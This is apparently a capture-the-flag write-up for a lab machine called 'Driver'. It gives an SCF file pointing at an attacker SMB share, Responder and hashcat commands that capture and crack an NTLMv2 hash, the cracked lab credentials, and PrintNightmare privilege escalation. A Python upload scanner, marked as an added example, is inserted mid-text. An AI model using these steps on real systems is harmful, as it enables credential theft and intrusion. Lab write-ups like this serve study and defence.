Driver
Enumeration
Ports and Services
Software Installed:
Nmap Scan Results:
Main Webpage:
Firmware Updates Page:
Initial Foothold
Site is vulnerable to an SCF attack
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
Setup according to article:
pentest.scf:
[Shell]
Command=2
IconFile=\\10.10.14.31\share\pentest.ico
[Taskbar]
Command=ToggleDesktop
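The SCF file above works because Explorer resolves the IconFile UNC path as soon as the share folder is browsed. As an added example (not part of this writeup or of the cited article), the following Python check shows how a defender could screen files arriving through an upload feature like the firmware update page: it parses the INI-style shortcut formats that carry an IconFile key (SCF, and the same key in .url files), flags any entry pointing at a UNC path, and rates the finding by whether the share host is on an allow-list of known internal file servers. The sample uploads and the TRUSTED_HOSTS list are constructed; the share host 10.10.14.31 is taken from the SCF on this page.

```python
"""Flag uploaded shortcut files whose IconFile points at a remote UNC share.

Added example for this writeup; not code from the original page or from any
tool it cites. Sample inputs and the trusted-host allow-list are constructed.
"""
import re
from typing import Dict, List, Optional

# Match a UNC path: \\host\share (host and share may not contain '\' or spaces).
UNC_RE = re.compile(r"^\\\\([^\\\s]+)\\([^\\\s]+)")

# INI-style sections in which Explorer resolves an IconFile automatically.
ICON_SECTIONS = ("shell", "internetshortcut")

# Constructed allow-list of internal file servers a legitimate upload might reference.
TRUSTED_HOSTS = {"fs01.corp.example"}

# Constructed sample uploads; pentest.scf mirrors the file shown in this writeup.
SAMPLES: Dict[str, str] = {
    "pentest.scf": r"""[Shell]
Command=2
IconFile=\\10.10.14.31\share\pentest.ico
[Taskbar]
Command=ToggleDesktop
""",
    "firmware_notes.url": r"""[InternetShortcut]
URL=https://vendor.example/fw
IconFile=\\fs01.corp.example\icons\fw.ico
IconIndex=0
""",
    "desktop.ini": r"""[.ShellClassInfo]
IconResource=C:\Windows\System32\shell32.dll,3
""",
}


def parse_ini_like(text: str) -> Dict[str, Dict[str, str]]:
    """Tolerant INI parser: lower-cases section and key names, ignores blanks/comments."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def unc_icon_target(text: str) -> Optional[str]:
    """Return 'host\\share' if an IconFile in a watched section is a UNC path, else None."""
    sections = parse_ini_like(text)
    for section in ICON_SECTIONS:
        icon = sections.get(section, {}).get("iconfile")
        if not icon:
            continue
        match = UNC_RE.match(icon)
        if match:
            return f"{match.group(1)}\\{match.group(2)}"
    return None


def scan_uploads(uploads: Dict[str, str], trusted_hosts=TRUSTED_HOSTS) -> List[dict]:
    """Return one finding per upload whose icon resolves to a UNC share.

    Severity is 'high' when the share host is not a known internal server
    (the classic NTLM-capture setup) and 'low' when it is on the allow-list.
    """
    findings: List[dict] = []
    for name, text in uploads.items():
        target = unc_icon_target(text)
        if target is None:
            continue
        host = target.split("\\", 1)[0]
        findings.append({
            "file": name,
            "unc": target,
            "host": host,
            "severity": "low" if host in trusted_hosts else "high",
        })
    return findings


if __name__ == "__main__":
    for finding in scan_uploads(SAMPLES):
        print(f"{finding['severity'].upper():4} {finding['file']}: IconFile -> \\\\{finding['unc']}")
```

The check is deliberately extension-agnostic: a renamed file still carries the IconFile key, so parsing the content rather than trusting the filename is what makes it useful at an upload boundary.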
Ran responder:
CMD: responder -wrf --lm -v -I tun0
Uploaded pentest.scf to the Firmware Update page and captured NTLMv2 hashes:
Cracked Password with hashcat:
CMD: hashcat -a 0 -m 5600 Driver-Hash -o Driver-Cracked.txt /usr/share/wordlists/rockyou.txt
Username: DRIVER\Tony
Password: liltony
User.txt Proof Screenshot
User.txt Contents
Privilege Escalation
Possible PrintNightmare vulnerability:
User Tony is able to install printer drivers as a low-privilege user
Article:
https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
Copied PowerShell script:
https://github.com/calebstewart/CVE-2021-1675
Transferred the script to the victim and executed it, creating the user pentest:
User Pentest:
Logged in as pentest
Root.txt Proof Screenshot